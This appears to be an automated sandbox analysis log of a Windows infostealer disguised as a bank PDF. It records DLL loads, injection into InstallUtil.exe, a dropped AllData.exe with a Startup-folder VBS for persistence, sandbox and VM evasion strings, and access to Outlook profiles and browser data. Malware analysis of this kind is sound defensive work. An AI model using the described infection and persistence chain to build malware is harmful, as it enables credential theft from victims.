Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exe | Section loaded: rasapi32.dll
Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exe | Section loaded: rasman.dll
Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exe | Section loaded: rtutils.dll
Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exe | Section loaded: secur32.dll
Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exe | Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: msvbvm60.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: vb6zz.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: sxs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: scrrun.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: winsqlite3.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: cdosys.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: inetcomm.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: msoert2.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: oleacc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: inetres.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: activeds.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: adsldpc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: netapi32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: logoncli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: mlang.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: msxml3.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\AllData.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\AllData.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\AllData.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\AllData.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\AllData.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\AllData.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\AllData.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\AllData.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\AllData.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\AllData.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\AllData.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\AllData.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\AllData.exe | Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\AllData.exe | Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\AllData.exe | Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\AllData.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\AllData.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\AllData.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\AllData.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\AllData.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\AllData.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\AllData.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\AllData.exe | Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\AllData.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\AllData.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\AllData.exe | Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\AllData.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\AllData.exe | Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\AllData.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\AllData.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\AllData.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\AllData.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\AllData.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\AllData.exe | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\AllData.exe | Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\AllData.exe | Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: msvbvm60.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: vb6zz.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: sxs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: scrrun.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: winsqlite3.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: cdosys.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: inetcomm.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: msoert2.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: oleacc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: inetres.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: activeds.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: adsldpc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: netapi32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: logoncli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: mlang.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: msxml3.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: msxml3.dll
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\Jump to behavior
            Source: BBVA-P53269 .pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: BBVA-P53269 .pdf.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: BBVA-P53269 .pdf.exe, 00000004.00000002.1338873710.0000000006E90000.00000004.08000000.00040000.00000000.sdmp, AllData.exe, 00000009.00000002.1469533149.00000000037CD000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: W.pdb4 source: BBVA-P53269 .pdf.exe, 00000004.00000002.1333737955.00000000041F5000.00000004.00000800.00020000.00000000.sdmp, BBVA-P53269 .pdf.exe, 00000004.00000002.1333737955.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3746600843.0000000000401000.00000040.00000400.00020000.00000000.sdmp, AllData.exe, 00000009.00000002.1469533149.0000000003568000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: BBVA-P53269 .pdf.exe, 00000004.00000002.1338873710.0000000006E90000.00000004.08000000.00040000.00000000.sdmp, AllData.exe, 00000009.00000002.1469533149.00000000037CD000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: protobuf-net.pdbSHA256}Lq source: BBVA-P53269 .pdf.exe, 00000004.00000002.1338604473.0000000006840000.00000004.08000000.00040000.00000000.sdmp, BBVA-P53269 .pdf.exe, 00000004.00000002.1333737955.00000000040B1000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: protobuf-net.pdb source: BBVA-P53269 .pdf.exe, 00000004.00000002.1338604473.0000000006840000.00000004.08000000.00040000.00000000.sdmp, BBVA-P53269 .pdf.exe, 00000004.00000002.1333737955.00000000040B1000.00000004.00000800.00020000.00000000.sdmp

            Data Obfuscation

            Source: BBVA-P53269 .pdf.exe, AutomatedDecorator.cs | .Net Code: CloseDecorator System.AppDomain.Load(byte[])
            Source: 4.2.BBVA-P53269 .pdf.exe.6e90000.8.raw.unpack, ReflectionHelper.cs | .Net Code: InvokeMethod
            Source: 4.2.BBVA-P53269 .pdf.exe.6e90000.8.raw.unpack, XmlSerializationHelper.cs | .Net Code: ReadObjectProperties
            Source: 4.2.BBVA-P53269 .pdf.exe.6840000.7.raw.unpack, TypeModel.cs | .Net Code: TryDeserializeList
            Source: 4.2.BBVA-P53269 .pdf.exe.6840000.7.raw.unpack, ListDecorator.cs | .Net Code: Read
            Source: 4.2.BBVA-P53269 .pdf.exe.6840000.7.raw.unpack, TypeSerializer.cs | .Net Code: CreateInstance
            Source: 4.2.BBVA-P53269 .pdf.exe.6840000.7.raw.unpack, TypeSerializer.cs | .Net Code: EmitCreateInstance
            Source: 4.2.BBVA-P53269 .pdf.exe.6840000.7.raw.unpack, TypeSerializer.cs | .Net Code: EmitCreateIfNull
            Source: 4.2.BBVA-P53269 .pdf.exe.43cd9f8.1.raw.unpack, AutomatedDecorator.cs | .Net Code: CloseDecorator System.AppDomain.Load(byte[])
            Source: Yara match | File source: 4.2.BBVA-P53269 .pdf.exe.65f0000.6.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 4.2.BBVA-P53269 .pdf.exe.65f0000.6.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000004.00000002.1333737955.0000000004281000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.1314628182.0000000003165000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.1338063941.00000000065F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.1314628182.00000000030F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000009.00000002.1448506731.00000000024F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: BBVA-P53269 .pdf.exe PID: 7844, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: AllData.exe PID: 7936, type: MEMORYSTR
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exe | Code function: 4_2_06F264B7 pushfd ; iretd 4_2_06F264C1
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exe | Code function: 4_2_06F270FF push esp; ret 4_2_06F27109
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 6_2_0042C4DC pushfd ; retf 0042h 6_2_0042C4DD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 6_2_0042C9F9 push ss; iretd 6_2_0042C9FF
            Source: C:\Users\user\AppData\Roaming\AllData.exe | Code function: 9_2_062764B7 pushfd ; iretd 9_2_062764C1
            Source: C:\Users\user\AppData\Roaming\AllData.exe | Code function: 9_2_062770FF push esp; ret 9_2_06277109
            Source: 4.2.BBVA-P53269 .pdf.exe.61d0000.4.raw.unpack, pRy1ABjF7TXOJ1mHqjD.cs | High entropy of concatenated method names: 'rkyjspwPpA', 'pAEj1JuRTX', 'etIjNDsglZ', 'ouEj94NIlO', 'bmwjqwhk7D', 'HdUjnWTgh9', 'rUwjOotGJL', 'gp8jkkcV4K', 'AnAjIOypVo', 'Uilj2APBTp'
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exe | File created: C:\Users\user\AppData\Roaming\AllData.exe (dropped file)

            Boot Survival

            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AllData.vbs (dropped file)

            Hooking and other Techniques for Hiding and Protection

            Source: Possible double extension: pdf.exe | Static PE information: BBVA-P53269 .pdf.exe
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\AllData.exe | Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Source: Yara matchFile source: Process Memory Space: BBVA-P53269 .pdf.exe PID: 7844, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: AllData.exe PID: 7936, type: MEMORYSTR
            Source: BBVA-P53269 .pdf.exe, 00000004.00000002.1314628182.0000000003165000.00000004.00000800.00020000.00000000.sdmp, AllData.exe, 00000009.00000002.1448506731.00000000024F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeMemory allocated: 1710000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeMemory allocated: 30B0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeMemory allocated: 1710000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeMemory allocated: 720000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeMemory allocated: 24B0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeMemory allocated: AA0000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: foregroundWindowGot 1625Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: foregroundWindowGot 1774Jump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
            Source: WebData.6.drBinary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
            Source: WebData.6.drBinary or memory string: tasks.office.comVMware20,11696501413o
            Source: WebData.6.drBinary or memory string: trackpan.utiitsl.comVMware20,11696501413h
            Source: WebData.6.drBinary or memory string: netportal.hdfcbank.comVMware20,11696501413
            Source: WebData.6.drBinary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
            Source: WebData.6.drBinary or memory string: dev.azure.comVMware20,11696501413j
            Source: WebData.6.drBinary or memory string: Interactive userers - COM.HKVMware20,11696501413
            Source: InstallUtil.exe, 0000000B.00000002.3749141355.0000000001374000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW4
            Source: InstallUtil.exe, 00000006.00000002.3748268757.0000000000C33000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3748268757.0000000000BDC000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3748344854.000000000130C000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.3749141355.0000000001374000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: wscript.exe, 00000008.00000002.1413381882.0000015999414000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
            Source: WebData.6.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696501413
            Source: wscript.exe, 00000008.00000002.1413381882.0000015999414000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: r&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{5d-
